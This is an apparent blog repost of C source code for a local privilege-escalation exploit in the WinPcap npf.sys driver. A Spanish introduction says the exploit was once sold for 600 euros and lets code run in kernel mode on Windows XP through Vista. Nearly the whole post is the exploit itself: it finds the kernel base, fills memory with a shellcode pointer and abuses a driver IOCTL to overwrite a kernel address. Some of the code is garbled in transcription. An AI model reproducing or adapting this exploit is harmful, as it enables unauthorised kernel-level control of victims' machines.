Saturday, September 2, 2017

12.15 pm. Este exploit ha estado a la venta por 600 € desde el 24 de Abril del 2007. El fallo está en el driver npf.sys de las librerias de captura de paquetes WinPcap. Está probado y testeado con WinPcap 3.1 y la beta 4.1 Funciona con Windows XP+SP2, 2000 server y workstation, Windows 2003 Server y Windows Vista. Si utilizas RunAs para ejecutar Wireshark por ejemplo, y no descargas manualmente el driver tras utilizarlo; con este exploit puedes cargar y ejecutar código en Ring0. Por lo tanto, tu código se ejecuta en Kernel Mode.


*/

#define _CRT_SECURE_NO_DEPRECATE

#include
#include

#define IOCTL_BIOCGSTATS 9031
#define OUT_SIZE 0x10
#define NDRIVERS_LIST 100

enum OSes
{
OS_WXP=1,
OS_W2K,
OS_W2K3,
OS_VISTA
};

#define WXP_DELTA 0xA67FF; // SP2 Fully patched!!
#define W2K_DELTA 0x0;
#define W2K3_DELTA 0x0;
#define WVISTA_DELTA 0x0;

DWORD  g_dwOsVersion        = 0;
LPVOID g_PatchAddress       = NULL;
LPBYTE g_WXP_PATCH_BYTES    = "x80x83xffx2Cx75x2Fx53xE8xE1xA2xF7xFFx89x45xDCx85";
LPBYTE g_W2K_PATCH_BYTES    = "xCCxCCxCC";
LPBYTE g_W2K3_PATCH_BYTES   = "xCCxCCxCC";
LPBYTE g_WVISTA_PATCH_BYTES = "xCCxCCxCC";

typedef BOOL (WINAPI *PENUMDEVICES)(LPVOID*,
DWORD ,
LPDWORD);

typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase,
char  *lpBaseName,
DWORD nSize);

typedef DWORD (WINAPI* PQUERYSYSTEM)(UINT, PVOID, DWORD,PDWORD);

BOOL GetNpfDevice (char *lpNpfDevice)
{
DWORD  cb,lpType;
char  *lpList,*tmp;
HKEY  hkey;
BOOL   bRes = FALSE;

lpList = malloc(0x1000);
memset(lpList,0,0x1000);
cb = 0x1000;

if ( RegOpenKeyExA(HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\EAPOL\Parameters\General",0,KEY_READ,&hkey) == ERROR_SUCCESS )
{
printf("AQUI");
if ( RegQueryValueExA( hkey,
"InterfaceList",
0,
&lpType,
lpList,
&cb)  == ERROR_SUCCESS )
{
strcpy(lpNpfDevice,"\\.\NPF_");
while(*lpList && *lpList !=''{'') lpList++;
tmp = lpList;
while(*lpList && *(lpList) != ''}'') lpList ++;
*(++lpList) = '''';
strcat(lpNpfDevice,tmp);
bRes = TRUE;
}

}

free(lpList);

if (!bRes)
{
printf("Cannot generate NPF Device Name :-( 
");
}

return bRes;

}

LPVOID GetNtosBase (VOID)
{
HANDLE hLib;
PENUMDEVICES pEnumDeviceDrivers;
PGETDEVNAME  pGetDeviceDriverBaseName;
DWORD  lpcbNeeded,i;
LPVOID NtosBase = NULL;
LPVOID *lpImageBases = NULL;
char   lpBaseName[MAX_PATH];

if ( ( hLib = LoadLibraryA("psapi.dll")) &&
 ( pEnumDeviceDrivers = (PENUMDEVICES) GetProcAddress(hLib,"EnumDeviceDrivers") ) &&
 ( pGetDeviceDriverBaseName = (PGETDEVNAME) GetProcAddress(hLib,"GetDeviceDriverBaseNameA")) )
{

lpImageBases = malloc( sizeof(LPVOID) * NDRIVERS_LIST );
pEnumDeviceDrivers(lpImageBases,sizeof(LPVOID) * NDRIVERS_LIST,&lpcbNeeded);

if ( (lpcbNeeded / sizeof(LPVOID)) > NDRIVERS_LIST)
{
lpImageBases = realloc(lpImageBases,sizeof(LPVOID) * lpcbNeeded);
pEnumDeviceDrivers(lpImageBases,lpcbNeeded,&lpcbNeeded);
}

for (i = 0; i < (lpcbNeeded / sizeof(LPVOID)) ; i++ )
{
if ( pGetDeviceDriverBaseName(lpImageBases[i],lpBaseName,MAX_PATH) )
{
printf ("%s
",lpBaseName);
if (!strcmp(lpBaseName,"ntoskrnl.exe"))
{
NtosBase = lpImageBases[i];
printf("NTOSKRNL Base found at %#p
",NtosBase);
break;
}
}
}

free(lpImageBases);
}

else
{
printf("Cannot Load psapi exports!
");
}

return NtosBase;  
}

DWORD GetOSVersion (VOID)
{
OSVERSIONINFOA  osvi;
DWORD retval = 0;

osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOA);

if ( GetVersionExA(&osvi) )
{
if (osvi.dwMajorVersion == 5)
{
switch(osvi.dwMinorVersion)
{
case 0:
retval = OS_W2K;
break;
case 1:
retval = OS_WXP;
break;
case 2:
retval = OS_W2K3;
break;
}
}

else if (osvi.dwMajorVersion == 6)
{
retval = OS_VISTA;
}
}

g_dwOsVersion = retval;

return retval;
}


DWORD GetNtosDelta (VOID)
{
DWORD retval = 0;

switch(GetOSVersion())
{
case OS_VISTA:
printf("System identified as Windows Vista
");
retval = WVISTA_DELTA;
break;
case OS_W2K:
printf("System identified as Windows 2000
");
retval = W2K_DELTA;
break;
case OS_W2K3:
printf("System identified as Windows 2003
");
retval = W2K3_DELTA;
break;
case OS_WXP:
printf("System identified as Windows XP
");
retval = WXP_DELTA;
break;
default:
printf("Unidentified system!
");
}

return retval;

}

__declspec( naked ) void ShellCode (VOID)
{
// Just debug it, to check code execution ;-)

__asm int 3;

// The patch _should_ be done fastly ... that´s why we use global vars...

switch(g_dwOsVersion)
{
case OS_VISTA:
memcpy( g_PatchAddress, g_WVISTA_PATCH_BYTES,0x10);
break;
case OS_W2K:
memcpy( g_PatchAddress, g_W2K_PATCH_BYTES,0x10);
break;
case OS_WXP:
memcpy( g_PatchAddress, g_WXP_PATCH_BYTES,0x10);
break;
case OS_W2K3:
memcpy( g_PatchAddress,g_W2K3_PATCH_BYTES,0x10);
break;
}

// Go out without raising an exception ;-), indeed this is inside a SEH frame but ... wtf! :-)

__asm 

mov  eax, [g_PatchAddress]
inc  eax
push eax
ret
}
}



int main(int argc, char **argv)
{
HANDLE       hDevice;
LPVOID  lpNtosSwitch;
DWORD  cb, delta;
DWORD  values[4];
LPVOID  lpFakeTable;
PQUERYSYSTEM NtQuerySystemInformation;
char  szNpfDevice[100];
BYTE  QueryBuffer[0x24];
int  i;

NtQuerySystemInformation = (PQUERYSYSTEM) GetProcAddress(GetModuleHandleA("NTDLL.DLL"),"NtQuerySystemInformation");

printf ("Searching for a valid Interface ...
");

if ( GetNpfDevice(szNpfDevice) )
{
printf("NPF Device name generated! : %s
",szNpfDevice);
}

else
{
printf("Cannot found any valid Interface!
");
return 0;
}

if ( lpFakeTable = VirtualAlloc((LPVOID)0x570000,
0x20000,
MEM_COMMIT|MEM_RESERVE,
PAGE_EXECUTE_READWRITE) )
{
printf("Memory allocated at %p
",lpFakeTable);

for ( i=0; i < ( 0x20000/sizeof(LPVOID) ); i++)
{
* ( (LPVOID *)lpFakeTable + i) = ShellCode;
}

printf("Memory mapping filled! ... 
");

}

else
{
printf("Cannot allocate memory!
");
return 0;
}

if ( (hDevice = CreateFileA(szNpfDevice,
  GENERIC_READ|GENERIC_WRITE,
  0,
  0,
  OPEN_EXISTING,
  0,
  NULL) ) != INVALID_HANDLE_VALUE )
{
printf("Device %s succesfully opened!
", szNpfDevice);

if ( (lpNtosSwitch = GetNtosBase()) && ( delta = GetNtosDelta()) )
{
g_PatchAddress = (LPVOID) ((LPBYTE) lpNtosSwitch + delta );

if ( DeviceIoControl(hDevice, 
IOCTL_BIOCGSTATS, 
(LPVOID)0,0,
(LPVOID)values,OUT_SIZE,
&cb,  
NULL) )
{
printf("First time reading ... bytes returned %#x
",cb);

for (i = 0;i<4 i="" span="">
{
printf ("OutBuffer[i] = %#x
",values[i]);
}
}

printf("Launching exploit ... 
Overwritting NTOSKRNL switch at -> %#p
",g_PatchAddress);


if ( DeviceIoControl(hDevice, 
 IOCTL_BIOCGSTATS, 
(LPVOID)0,0,
(LPVOID)g_PatchAddress,OUT_SIZE,
&cb,  
NULL) )

{
// Dirty trick .. 
NtQuerySystemInformation(0x15,QueryBuffer,sizeof(QueryBuffer), NULL);
// Bye bye god mode!
printf("We are back from ring0!
");
}
}
}

else
{
printf("Error: Cannot open device %s
",szNpfDevice);
}
}


https://foro.elhacker.net/profiles/anelkaos-u4699.html;sa,showPosts;topics;start,30

No comments:

Man in the Rain